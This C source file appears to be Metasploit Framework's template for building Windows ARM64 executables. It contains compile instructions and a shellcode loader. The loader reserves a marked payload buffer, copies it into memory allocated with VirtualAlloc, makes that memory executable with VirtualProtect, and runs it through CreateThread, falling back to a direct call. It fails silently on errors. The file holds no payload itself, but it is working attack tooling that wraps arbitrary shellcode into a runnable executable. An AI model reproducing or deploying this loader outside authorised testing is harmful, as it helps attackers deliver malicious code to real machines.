Path: blob/master/data/templates/src/pe/exe/template_aarch64_windows.c
// AArch64 PE EXE Template for Metasploit Framework1//2// -----------------------------------------------------------------------------3//4// Compilation Instructions:5//6// Using MSVC on a Windows ARM64 Host:7//8// cl.exe /nologo /O2 /W3 /GS- /D_WIN64 template_aarch64_windows.c /link ^9// /subsystem:windows /machine:arm64 /entry:main ^10// /out:template_aarch64_windows.exe kernel32.lib11//12// -----------------------------------------------------------------------------1314#define WIN32_LEAN_AND_MEAN15#include <windows.h>16#undef WIN32_LEAN_AND_MEAN1718#define PAYLOAD_MARKER "PAYLOAD:"19#define SCSIZE 81922021char payload[SCSIZE] = PAYLOAD_MARKER;2223int main(void)24{25void *exec_mem;26DWORD old_prot;27HANDLE hThread;2829// Stage 1: Allocate a block of memory. We request READWRITE permissions30// initially so we can copy our payload into it.31exec_mem = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);32if (exec_mem == NULL)33{34// Fail silently if allocation fails.35return 1;36}3738// Stage 2: Copy the payload from our data section into the new memory block.39// A simple loop is used for maximum compiler compatibility and to avoid40// needing extra headers like <string.h> for memcpy.41for (int i = 0; i < SCSIZE; i++)42{43((char *)exec_mem)[i] = payload[i];44}4546// Stage 3: Change the memory's protection flags from READWRITE to47// EXECUTE_READ.48if (VirtualProtect(exec_mem, SCSIZE, PAGE_EXECUTE_READ, &old_prot) == FALSE)49{50// Fail silently if we cannot make the memory executable.51return 1;52}5354// Stage 4: Execute the shellcode.55hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);56if (hThread)57{58WaitForSingleObject(hThread, INFINITE);59CloseHandle(hThread);60}61else62{63// As a fallback in case CreateThread fails, call the shellcode directly.64((void (*)())exec_mem)();65}6667return 0;68}697071